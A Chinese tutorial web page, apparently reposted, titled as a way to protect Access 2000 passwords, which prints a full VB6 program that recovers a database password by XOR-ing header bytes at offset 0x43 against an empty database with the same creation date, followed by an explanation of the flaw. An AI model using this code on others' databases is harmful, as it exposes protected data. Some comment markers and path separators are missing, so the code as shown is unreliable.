当前位置: 首页 > 图文教程 > 数据库 > Access > 防止Access 2000密码被破译的方法

Access
中文Access2000速成教程--1.2 使用“数据库向导”创建表
建立自由的会计日期的报表--1.2.创建让用户选择日期窗体
建立自由的会计日期的报表--1.1.认识几个有关时间的函数
建立自由的会计日期的报表
使用准则进行条件查询--1.5.常用的准则表达式
使用准则进行条件查询--1.4.从窗体中选择查询的条件
中文Access2000速成教程--1.1 使用“向导”设计数据库
获取ACCESS2000数据库中所有表的名称
中文Access2000速成教程--1.3 在“设计”视图中设计表
中文Access2000速成教程--1.4 使用“表向导”建立新表
中文Access2000速成教程--1.8 定义表之间的关系
中文Access2000速成教程--1.5 使用已有的数据自动建新表
中文Access2000速成教程--1.6 定义“主键”
中文Access2000速成教程--1.7 创建索引
解决Access中分组报表的问题
用 INNER JOIN语法联接多个表建记录集
ACCESS学习日记
Access保留字&变量名列表
如何 在Access中选择指定日期前的记录?
ACCESS中关于SQL语句的转义字符

防止Access 2000密码被破译的方法


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-17   浏览: 41 ::
收藏到网摘: n/a

如果你过分信任 Access 2000数据库的密码保护,你可能会因此而蒙受损失。这是因为Access 2000的数据库级密码并不安全,相反它很脆弱,甚至下面这段非常小的程序就可以攻破它:

程序一(VB6):Access 2000密码破译

以下为引用的内容:
Private Sub Command1_Click()
Const Offset = &H43 文件偏移地址:Access数据库从此处开始存放加密密码
Dim bEmpty(1 To 2) As Byte, bPass(1 To 2) As Byte
Dim i As Integer, Password As String
打开一个空数据库作为参照
Open "D:VB6_TestMDB_PasswordNew_Empty_DB.mdb" For Binary As #1
打开被密码保护的数据库
Open "D:VB6_TestMDB_PasswordPass_Protected_DB.mdb" For Binary As #2
Seek #1, Offset
Seek #2, Offset
For i = 1 To 20 ' Access 2000 数据库密码最长允许20位
Get #1, , bEmpty ' 其中每位密码占两个字节
Get #2, , bPass ' 一个汉字也仅是一位密码,占两个字节
If (bEmpty(1) Xor bPass(1)) <> 0 Then
Password = Password + Chr(bEmpty(1) Xor bPass(1)) ' 将密码解密
End If
Next
Close 1, 2
MsgBox "Password:" + Password ' 显示密码
End Sub

一、深入分析

上述程序成功的关键是使用了一个空数据库(New_Empty_DB.mdb)。该数据库的创建日期必须与被密码保护的数据库(Pass_Protected_DB.mdb)相一致。 换句话说,Access 2000 仅仅是使用“数据库创建日期”来加密用户密码。

应注意的是:上面的“创建日期”只是操作系统级的,也就是 Windows记录在文件夹目录里的信息(根据文件名的长短,每个文件在目录里占用至少32个字节,包括:文件名、属性、文件大小、首蔟号、创建时间、修改时间和访问时间等)。